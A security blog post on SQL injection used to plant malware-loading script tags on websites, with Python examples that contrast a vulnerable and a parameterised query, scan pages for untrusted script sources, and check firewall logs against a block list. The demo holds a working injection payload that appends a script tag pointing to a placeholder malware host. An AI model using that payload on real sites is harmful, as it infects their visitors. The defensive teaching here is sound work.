A number of commentators, notably IBM’s Kris Lamb, have reported that malicious code is no longer limited, for the most part, to p0rn and other sleazy websites. Hackers are targeting the more commonly used education, healthcare, blogging and small ecommerce websites, where they can break in and insert hostile code that redirects the visitor’s browser to download malware.
“We’ve reached a tipping point where every website should be viewed as suspicious and every user is at risk,” Lamb said in a statement. “The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity.”
The primary mode of attack appears to be SQL injection, which remains a widespread weakness because handling user input correctly on a website is technically challenging. So the bad guys hack in and drop a script such as:
And it runs every time someone visits the page, silently installing malware in the background.
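To make the mechanism concrete, here is an added example (not code from the original post) that shows the weak pattern beside the fixed one. It uses Python’s built-in sqlite3 module against a constructed in-memory blog table; the script host and the post contents are placeholders. The vulnerable function pastes the submitted title into the SQL text, so one crafted “title” rewrites every post body; the parameterised function hands the same input to the driver as data and it is stored as a literal string.

```python
import sqlite3

# Constructed placeholder for the kind of tag the attackers append; not a real host.
INJECTED_TAG = '<script src="http://malware-host.example.invalid/b.js"></script>'


def make_db():
    """Create an in-memory blog database with two constructed posts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO posts (title, body) VALUES (?, ?)",
        [("Welcome", "<p>First post</p>"), ("Hours", "<p>Open 9 to 5</p>")],
    )
    conn.commit()
    return conn


def rename_post_vulnerable(conn, post_id, new_title):
    """Builds the statement by string concatenation: the title is parsed as SQL."""
    sql = f"UPDATE posts SET title = '{new_title}' WHERE id = {int(post_id)}"
    conn.execute(sql)
    conn.commit()


def rename_post_safe(conn, post_id, new_title):
    """Parameterised statement: the driver sends the title as data, never as SQL."""
    conn.execute("UPDATE posts SET title = ? WHERE id = ?", (new_title, post_id))
    conn.commit()


def bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM posts ORDER BY id")]


def titles(conn):
    return [row[0] for row in conn.execute("SELECT title FROM posts ORDER BY id")]


# A constructed input of the kind submitted through a "rename post" form: it closes
# the quoted title, appends the tag to every body, and comments out the WHERE clause.
MALICIOUS_TITLE = "x', body = body || '" + INJECTED_TAG + "' WHERE 1=1 --"


def demo():
    """Return (bodies tagged via the vulnerable path, bodies tagged via the safe path,
    whether the safe path stored the input as a plain title)."""
    vuln = make_db()
    rename_post_vulnerable(vuln, 1, MALICIOUS_TITLE)
    safe = make_db()
    rename_post_safe(safe, 1, MALICIOUS_TITLE)
    return (
        sum(INJECTED_TAG in b for b in bodies(vuln)),
        sum(INJECTED_TAG in b for b in bodies(safe)),
        titles(safe)[0] == MALICIOUS_TITLE,
    )


if __name__ == "__main__":
    print(demo())  # (2, 0, True)
```

The point of the comparison is that the fix is not a clever filter on quotes: the parameterised statement never lets the input reach the SQL parser, so the same string that rewrote both posts is simply an odd-looking title.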
If you run a query in Google, around 60,000 websites have this embedded in their page code. Needless to say, don’t visit any of them. I used Google to check the three websites I support via the “site:” search function. You can, too.
What to do? Use some freeware or shareware to do an initial scan for vulnerabilities. Scan your web pages for odd looking script sources. If you find them, you’ll know your web code is vulnerable somewhere. Set about finding where in a hurry, because the bad guy, or some other bad guy will find it again.
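The scan for odd-looking script sources can be automated. The following is an added example, not a tool from the original post: it parses saved page HTML with Python’s standard html.parser, collects every `<script src=...>`, and reports the ones whose host is neither your own site (relative paths) nor on a list of hosts you trust. The sample page, the trusted hosts and the suspicious host are all constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSourceCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, wherever it sits in the page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def _host_of(src):
    """Return the lowercased host of a script URL, or '' for a relative path."""
    host = urlparse(src).netloc.lower()
    if "@" in host:                      # strip userinfo if someone tries to hide a host
        host = host.rsplit("@", 1)[1]
    return host.split(":")[0]            # drop any port


def external_script_sources(html, trusted_hosts):
    """Return script sources loaded from hosts that are not trusted."""
    parser = ScriptSourceCollector()
    parser.feed(html)
    suspicious = []
    for src in parser.sources:
        host = _host_of(src)
        if host == "":                   # relative path: served by this site
            continue
        trusted = host in trusted_hosts or any(
            host.endswith("." + t) for t in trusted_hosts
        )
        if not trusted:
            suspicious.append(src)
    return suspicious


# Constructed sample page: one local script, one from a trusted CDN, and one
# injected tag (unquoted, as injected tags often are) at the end of the body.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/jquery.js"></script>
</head><body><p>Open 9 to 5</p>
<script src=http://malware-host.example.invalid/b.js></script>
</body></html>"""

TRUSTED = {"example.com"}


def scan_sample():
    return external_script_sources(SAMPLE_PAGE, TRUSTED)


if __name__ == "__main__":
    for src in scan_sample():
        print("suspicious script source:", src)
```

Run it over a crawl of your own pages (or a database dump of the content fields, since that is where injected tags usually live) and treat any hit as evidence that the application is injectable somewhere, not just as a tag to delete.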
Next, take a look at anything else coming in through your firewall: FTP, email and terminal services/Citrix. Consider any opening a vector for attack, even if you have locked down the external IP sources. Watch the logs carefully and daily.
Finally, watch outbound connections for known sites, such as the one above. Keep your ear out on security sites for the latest of those, and block connections to them from your firewall until they can be shut down.
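The outbound check can be scripted against the firewall log as well. Here is an added example, not part of the original post, that reads constructed log lines in a simple key=value layout (not any real product’s format) and flags connections whose destination host matches a block list, including subdomains of a blocked host, or whose destination address falls in a blocked network. The blocked host and the 203.0.113.0/24 range are placeholders (the latter is the TEST-NET-3 documentation range).

```python
import ipaddress
from collections import Counter

# Constructed block list of the kind gathered from security advisories (placeholders).
BLOCKED_HOSTS = {"malware-host.example.invalid"}
BLOCKED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed outbound firewall log lines; the format is invented for this example.
SAMPLE_LOG = """\
2008-05-12T09:01:05 action=allow proto=tcp src=10.0.0.14 dst=198.51.100.7 dport=80 host=www.example.com
2008-05-12T09:01:09 action=allow proto=tcp src=10.0.0.22 dst=203.0.113.45 dport=80 host=malware-host.example.invalid
2008-05-12T09:02:30 action=allow proto=tcp src=10.0.0.22 dst=203.0.113.45 dport=443 host=cdn.malware-host.example.invalid
2008-05-12T09:03:11 action=allow proto=udp src=10.0.0.14 dst=198.51.100.53 dport=53 host=
"""


def parse_line(line):
    """Split 'timestamp key=value key=value ...' into a dict."""
    parts = line.split()
    fields = {"ts": parts[0]}
    for kv in parts[1:]:
        key, _, value = kv.partition("=")
        fields[key] = value
    return fields


def is_blocked(fields):
    """True if the destination host or address is on the block list."""
    host = fields.get("host", "").lower().rstrip(".")
    if host and any(host == b or host.endswith("." + b) for b in BLOCKED_HOSTS):
        return True
    try:
        ip = ipaddress.ip_address(fields.get("dst", ""))
    except ValueError:          # missing or malformed address: cannot match by IP
        return False
    return any(ip in net for net in BLOCKED_NETWORKS)


def find_hits(log_text):
    """Return the parsed lines that match the block list."""
    records = [parse_line(line) for line in log_text.splitlines() if line.strip()]
    return [r for r in records if is_blocked(r)]


def hosts_by_source(log_text):
    """Count matching connections per internal source address: these are the
    machines to pull off the network and examine first."""
    return Counter(r["src"] for r in find_hits(log_text))


if __name__ == "__main__":
    for src, n in hosts_by_source(SAMPLE_LOG).items():
        print(f"{src}: {n} connection(s) to blocked destinations")
```

A match on an outbound line is the signal the post is asking you to watch for: a workstation that reached a known malware host after visiting a compromised page is the first place to look, and the log line tells you which one.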
More work, of course, but much LESS work than a successful attack!